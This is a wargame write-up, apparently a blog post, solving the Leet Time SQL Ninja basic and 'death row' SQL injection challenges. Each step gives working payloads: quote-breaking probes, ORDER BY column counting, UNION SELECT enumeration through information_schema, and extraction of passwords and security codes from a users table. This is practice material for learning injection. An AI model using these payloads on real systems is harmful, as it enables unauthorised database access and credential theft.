---
title: Leet Time SQL Ninja - Basic
date: 2019-11-03
tags:
 - web
 - sqlninja
 - wargame
---

# Writeup

### ES 1

url : http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1

**SQL**

id=`1'`

error: *right syntax to use near ''1''' at line 1*

probabilistic query :

`SELECT FROM table WHERE field='id'`

##### Injection

`1'OR 1 = 1-- -`

Find the number of columns:

`1' OR 1 = 1 ORDER BY 1,2,3 -- -`

Find the injectable column:

```
1' OR 1 = 1 UNION SELECT 1,'hello2',3 -- -
1' UNION SELECT 'hello1',version(),3 -- -
```
Find the current user and the database:

```
1' UNION SELECT 'hello1',current_user(),3 -- -
1' UNION SELECT 'hello1',database(),3 -- -
```
Find the table names from the database using the information_schema :

`1' UNION SELECT 'hello1',table_name,3 from information_schema.tables where table_schema=database() -- -`

Find the column names of a particular table:

`1' UNION SELECT 'hello1',column_name,3 from information_schema.columns where table_schema=database() and table_name='users'-- -`

Print information from a table (password,sec_code):

```
1' UNION SELECT '1',sec_code,3 from users-- -
1' UNION SELECT 'hello1',password,3 from users-- -
```


### ES 2

url : http://leettime.net/sqlninja.com/tasks/basic_ch2.php?id=1

**SQL**

id=`1'`

error: *right syntax to use near ''' at line 1*

proabilistic query:

`SELECT FROM table WHERE field=id`

##### Injection
so we need just to insert our payload without encoding it.
to get all username and the first user's password :
```
1 OR 1 = 1 --
1 UNION SELECT 1,password,3,4 FROM users LIMIT 1,1--
```

### ES 3

url : http://leettime.net/sqlninja.com/tasks/basic_ch3.php?id=1

**SQL**

id=`1"`

error : *right syntax to use near '"1""' at line 1*

probabilistic query :

`SELECT FROM table WHERE field = "id"`

##### Injection
To print the usernames :

`1" OR 1 = 1 --"`

enumerate columns :

`1" ORDER BY 1,2,3,4,5 --"`

print version :

`-1" UNION SELECT 1,version(),3,4,5 -- -"`

### ES 4

url : http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1

**SQL**

id=`1')`

error : *right syntax to use near '')' at line 1*

probabilistic query :

`SELECT FROM table WHERE field = ('id')`

##### Injection

find all username and print both *sec_code* and *password* of the first one (two methods) :
```
1') OR 1 = 1 -- -')
1') UNION SELECT 1,concat(sec_code,password),3,4 FROM users LIMIT 1,1 -- ")' --
-1') UNION SELECT 1,concat(sec_code,password),3,4 FROM users LIMIT 0,1 -- -')
```

## Death Row Injection

The death single row injection is when the website only prints the first result and we can't get all the array printed.
The SQL query would be something like this:

`Select Username from users limit 0,1;`


### ES 1

url : http://leettime.net/sqlninja.com/tasks/deathrow_ch1.php?id=1

**SQL**

id=`1'`

error : *right syntax to use near '' and id=1' limit 1' at line 1*

probabilistic query:

`SELECT FROM table WHERE field=1 limit 1`

##### Injection

Find the number of column and print the password of the user

```
-1 ORDER BY 1,2,3,4,5-- -
-1 UNION SELECT 1,password,3,4,5 FROM users--
```

### ES 2

url: http://leettime.net/sqlninja.com/tasks/deathrow_ch2.php?id=1

**SQL**

id=`1'`

error : *right syntax to use near '')) limit 1' at line 1*

to get the same result as `id=1` :

`1)) OR 1 = 1 -- -`

probabilistic query :

`SELECT FROM table WHERE (field=(id))`

##### Injection

to get password :

`-1)) UNION SELECT 1,password FROM users -- -`

to get all sec_codes/passwords :

`-1)) UNION SELECT 1,group_concat(sec_code,password) FROM (SELECT sec_code,password FROM users limit 0,8)a -- -`

to increase buffer up to 8192 byte (in this case 2048):

`-1)) UNION SELECT 1,CAST(GROUP_CONCAT(sec_code,password) AS CHAR(2048)) FROM (SELECT sec_code,password FROM users limit 0,8)a -- -`


### ES 3

url: http://leettime.net/sqlninja.com/tasks/deathrow_ch3.php?id=1

**SQL**

id=`1"`

*error*: right syntax to use near `'"1""` limit 1' at line 1.

probabilistic query:

`SELECT FROM users WHERE id = "id" limit 1;`

##### injection

to find the columns number :

`1" ORDER BY 1,2,3,4,5,6 --"`

to print user() :

`-1" UNION SELECT 1,2,3,user(),5 -- -"`

### ES 4

url: http://leettime.net/sqlninja.com/tasks/deathrow_ch4.php?id=1

**SQL**

id=`1")`

*error* : right syntax to use near '")' at line 1

probabilistic query :

`SELECT FROM users WHERE id = ("id");`

##### Injection

find injectable paramater :

`-1") UNION SELECT 1,2,3,4,5,6,7-- -")`

print sec_code :

`-1") UNION SELECT 1,2,3,sec_code,5,6,7 FROM users-- -")`

